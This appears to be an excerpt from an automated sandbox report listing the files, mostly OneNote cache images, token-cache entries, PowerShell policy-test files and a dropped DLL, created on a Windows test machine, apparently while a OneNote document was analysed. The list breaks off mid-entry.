C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004A.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin
PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004V.bin
PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000050.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin
JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000055.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000056.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000057.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin
PNG image data, 40 x 623, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005I.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005J.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005K.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005L.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005M.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005O.bin
PNG image data, 60 x 336, 4-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005P.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005Q.bin
PNG image data, 40 x 617, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005S.bin
PNG image data, 50 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005U.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000060.bin
PNG image data, 77 x 627, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000061.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000062.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000063.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000064.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000065.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000066.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000067.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000068.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000069.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006A.bin
PNG image data, 176 x 513, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006C.bin
PNG image data, 40 x 650, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006E.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006G.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006I.bin
PNG image data, 50 x 556, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006J.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006K.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin
PNG image data, 171 x 552, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006O.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006Q.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006S.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006U.bin
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000070.bin
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000072.bin
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin
PNG image data, 50 x 500, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin
PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin
PNG image data, 39 x 600, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007R.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin
PNG image data, 39 x 579, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007T.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin
PNG image data, 30 x 700, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007V.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000081.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin
PNG image data, 85 x 470, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008C.bin
PNG image data, 88 x 574, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008E.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008G.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008I.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008K.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008M.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008O.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008P.bin
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\de-ch[1].htm
HTML document, Unicode text, UTF-8 text, with very long lines (3929), with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675800120151438600_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log
ASCII text, with very long lines (9332), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Diagnostics\ONENOTE\App_1675800120152158700_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0p22qofu.bhw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ownlyw2.p2v.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5br2alh.dlr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uegvsqlt.h1j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\e77242d6.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\{00674DC2-B41D-4B0B-9989-A20E4FDD944C}
PNG image data, 40 x 617, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{09CE97BB-0A80-4E71-8376-15B3505CC131}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{0DF51EC1-3AA7-4E7B-9C2F-D22BD13F6190}
PNG image data, 88 x 574, 8-bit colormap, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{101FBD66-C705-4458-A7DC-E6E51AC79468}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{11465873-84C8-4860-969F-229AFD5F82F3}
PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{17C9BDF7-E8BD-44BF-986D-79C48F038B73}
PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\{194EF100-73A4-4EEB-A6A0-4DECD8007540}
data
dropped
C:\Users\user\AppData\Local\Temp\{1A8EE2E6-020D-4445-98FA-9B3268050AAA}
data
dropped
C:\Users\user\AppData\Local\Temp\{1B30A61F-44D3-402F-B98E-D39EAA8FB439}
data
dropped
C:\Users\user\AppData\Local\Temp\{1C96B25D-0FE3-408E-89C0-52E690B483B7}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{227F92D9-FEEE-4638-A8E4-EFCDC031D124}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
dropped
C:\Users\user\AppData\Local\Temp\{28EC448F-E1EA-4DE2-898A-5B4E43B8B5AA}
data
dropped
C:\Users\user\AppData\Local\Temp\{2AA5D44C-225C-4704-BF76-C7CDE1003DFD}
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\{2CA139B0-DC4C-4ABA-86B5-45C1691EBF81}
JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
dropped
C:\Users\user\AppData\Local\Temp\{2D9CFD47-432F-4012-B427-4942AC47CE88}
data
dropped
C:\Users\user\AppData\Local\Temp\{2E6C7FBC-CB5E-4CFE-822B-84DA1DB93575}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{2E869D72-37FB-4151-A25D-42CE8540907F}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{305A3861-5DCF-4192-A0DC-351738319A9C}
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
dropped
C:\Users\user\AppData\Local\Temp\{30FF7F31-CF20-4218-AD19-9128CBCA8A8A}
JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
dropped
C:\Users\user\AppData\Local\Temp\{328812BD-2195-4A6C-922C-C585FC0DA0D8}
